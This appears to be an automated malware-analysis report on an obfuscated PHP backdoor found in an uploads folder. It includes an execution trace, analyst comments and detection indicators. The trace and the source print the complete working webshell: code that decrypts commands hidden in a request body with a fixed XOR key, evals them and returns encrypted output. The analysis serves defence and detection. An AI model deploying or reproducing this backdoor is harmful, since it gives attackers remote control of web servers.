PHP Malware Analysis

test1000.php

md5: 3ef55b993e8e09d39ee6ba948e9c0911

Screenshot


Attributes

Encoding

Execution

Files

Input


Deobfuscated PHP code

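Failed to deobfuscate code (static deobfuscation failed; the assembled payload string is visible in the execution trace below, as the return value of the second str_replace call)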

Execution traces

data/traces/3ef55b993e8e09d39ee6ba948e9c0911_trace-1676240850.6967.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:27:56.594527]
1	0	1	0.000180	393528
1	3	0	0.000260	396592	{main}	1		/var/www/html/uploads/test1000.php	0	0
1		A						/var/www/html/uploads/test1000.php	3	$j = ';$r#(#(=@b#(ase64_encode(@x(#(@gzc#(ompress(#(#($o),$k))#(;print(#("$p$#(kh$r$kf");}'
1		A						/var/www/html/uploads/test1000.php	4	$R = 'MBU3CONVDXm#(#(Q";funct#(ion #(x($t,$k){$c=#(strlen(#($k);#($l=strl#(en#(($t);$o="'
1		A						/var/www/html/uploads/test1000.php	5	$n = '";#(fo#(r($i=0#(;$i<$#(l;){fo#(r($j=0;($j<$c&#(&$i<$#(l);$j+#(+,#($i++){$o.#(=$t{#($i}^$k'
1		A						/var/www/html/uploads/test1000.php	6	$b = 's("#(php:/#(/inpu#(t"),#($m)==1) {@o#(#(b_start();@#(eva#(l(@gzu#(ncompress(#(@x(@b'
1		A						/var/www/html/uploads/test1000.php	7	$s = 'a#(se64_#(decod#(e($m[1])#(,$k)#());$o=@o#(b#(_get_conten#(ts();@#(ob_e#(n#(d_clean()'
1		A						/var/www/html/uploads/test1000.php	8	$a = '$k="67#(8914a7#(";$kh="58#(6#(9492615#(7a";#($kf="469d55a#(a47#(8c#(";$p=#("wu#(gp'
2	4	0	0.000420	396592	str_replace	0		/var/www/html/uploads/test1000.php	9	3	'uc'	''	'creucaucucte_ucfuucnctucion'
2	4	1	0.000443	396728
2	4	R			'create_function'
1		A						/var/www/html/uploads/test1000.php	9	$w = 'create_function'
1		A						/var/www/html/uploads/test1000.php	10	$Z = '{$j}#(;#(}}return $#(o;}#(i#(f (@preg#(_match(#("/$#(kh(#(.+)$kf/",@fi#(le_get_conte#(nt'
2	5	0	0.000502	397272	str_replace	0		/var/www/html/uploads/test1000.php	11	3	'#('	''	'$k="67#(8914a7#(";$kh="58#(6#(9492615#(7a";#($kf="469d55a#(a47#(8c#(";$p=#("wu#(gpMBU3CONVDXm#(#(Q";funct#(ion #(x($t,$k){$c=#(strlen(#($k);#($l=strl#(en#(($t);$o="";#(fo#(r($i=0#(;$i<$#(l;){fo#(r($j=0;($j<$c&#(&$i<$#(l);$j+#(+,#($i++){$o.#(=$t{#($i}^$k{$j}#(;#(}}return $#(o;}#(i#(f (@preg#(_match(#("/$#(kh(#(.+)$kf/",@fi#(le_get_conte#(nts("#(php:/#(/inpu#(t"),#($m)==1) {@o#(#(b_start();@#(eva#(l(@gzu#(ncompress(#(@x(@ba#(se64_#(decod#(e($m[1])#(,$k)#());$o=@o#(b#(_get_conten#(ts();@#(ob_e#(n#(d_clean();$r'
2	5	1	0.000562	397880
2	5	R			'$k="678914a7";$kh="58694926157a";$kf="469d55aa478c";$p="wugpMBU3CONVDXmQ";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/test1000.php	11	$l = '$k="678914a7";$kh="58694926157a";$kf="469d55aa478c";$p="wugpMBU3CONVDXmQ";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000641	397144	create_function	0		/var/www/html/uploads/test1000.php	12	2	''	'$k="678914a7";$kh="58694926157a";$kf="469d55aa478c";$p="wugpMBU3CONVDXmQ";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000752	405184	{internal eval}	1		/var/www/html/uploads/test1000.php	12	0
3	7	1	0.000773	405184
3	7	R			NULL
2	6	1	0.000794	403816
2	6	R			'\000lambda_10'
1		A						/var/www/html/uploads/test1000.php	12	$g = '\000lambda_10'
2	8	0	0.000832	403752	__lambda_func	1		/var/www/html/uploads/test1000.php	12	0
2		A						/var/www/html/uploads/test1000.php(12) : runtime-created function	1	$k = '678914a7'
2		A						/var/www/html/uploads/test1000.php(12) : runtime-created function	1	$kh = '58694926157a'
2		A						/var/www/html/uploads/test1000.php(12) : runtime-created function	1	$kf = '469d55aa478c'
2		A						/var/www/html/uploads/test1000.php(12) : runtime-created function	1	$p = 'wugpMBU3CONVDXmQ'
3	9	0	0.000918	403808	file_get_contents	0		/var/www/html/uploads/test1000.php(12) : runtime-created function	1	1	'php://input'
3	9	1	0.000949	404544
3	9	R			''
3	10	0	0.000968	404528	preg_match	0		/var/www/html/uploads/test1000.php(12) : runtime-created function	1	3	'/58694926157a(.+)469d55aa478c/'	''	NULL
3	10	1	0.001040	404688
3	10	R			0
2	8	1	0.001061	404448
1	3	1	0.001071	404448
			0.001113	321736
TRACE END   [2023-02-12 20:27:56.595500]


Generated HTML code

<html><head></head><body>����
</body></html>

Original PHP code

���
<?php
// Analyst annotations: comment lines only, not part of the hashed sample.
//
// Obfuscated backdoor loader. The payload source is stored as out-of-order
// single-quoted fragments ($a, $R, $n, $Z, $b, $s, $j) padded with the junk
// marker '#(', so identifiers such as eval, base64_decode, preg_match and
// php://input never appear intact in the file.
$j=';$r#(#(=@b#(ase64_encode(@x(#(@gzc#(ompress(#(#($o),$k))#(;print(#("$p$#(kh$r$kf");}';
$R='MBU3CONVDXm#(#(Q";funct#(ion #(x($t,$k){$c=#(strlen(#($k);#($l=strl#(en#(($t);$o="';
$n='";#(fo#(r($i=0#(;$i<$#(l;){fo#(r($j=0;($j<$c&#(&$i<$#(l);$j+#(+,#($i++){$o.#(=$t{#($i}^$k';
$b='s("#(php:/#(/inpu#(t"),#($m)==1) {@o#(#(b_start();@#(eva#(l(@gzu#(ncompress(#(@x(@b';
$s='a#(se64_#(decod#(e($m[1])#(,$k)#());$o=@o#(b#(_get_conten#(ts();@#(ob_e#(n#(d_clean()';
$a='$k="67#(8914a7#(";$kh="58#(6#(9492615#(7a";#($kf="469d55a#(a47#(8c#(";$p=#("wu#(gp';
// Removing the filler 'uc' yields the string 'create_function', so the
// function name is never written literally. create_function() was deprecated
// in PHP 7.2 and removed in PHP 8.0.
$w=str_replace('uc','','creucaucucte_ucfuucnctucion');
$Z='{$j}#(;#(}}return $#(o;}#(i#(f (@preg#(_match(#("/$#(kh(#(.+)$kf/",@fi#(le_get_conte#(nt';
// Concatenates the fragments in their real order and strips every '#('.
// The resulting source:
//   - defines x($t,$k), a repeating-key XOR of $t with $k;
//   - reads the raw request body (php://input) and looks for data between
//     the markers $kh and $kf;
//   - base64-decodes, XORs and gzuncompress()es that data, then eval()s it;
//   - buffers the output, gzcompress()es, XORs and base64-encodes it, and
//     prints it as $p . $kh . <data> . $kf.
// Every call is prefixed with @, so failures emit no warnings. The $t{$i}
// offset syntax in the payload is also rejected by PHP 8.
$l=str_replace('#(','',$a.$R.$n.$Z.$b.$s.$j);
// $w holds 'create_function': this compiles $l into an anonymous function
// with no parameters and calls it at once. Static indicators for detection:
// a callable name built with str_replace() and invoked through a variable,
// plus long string fragments sharing one junk marker. Network indicators:
// request bodies and responses delimited by the $kh/$kf marker values.
$g=$w('',$l);$g();
?>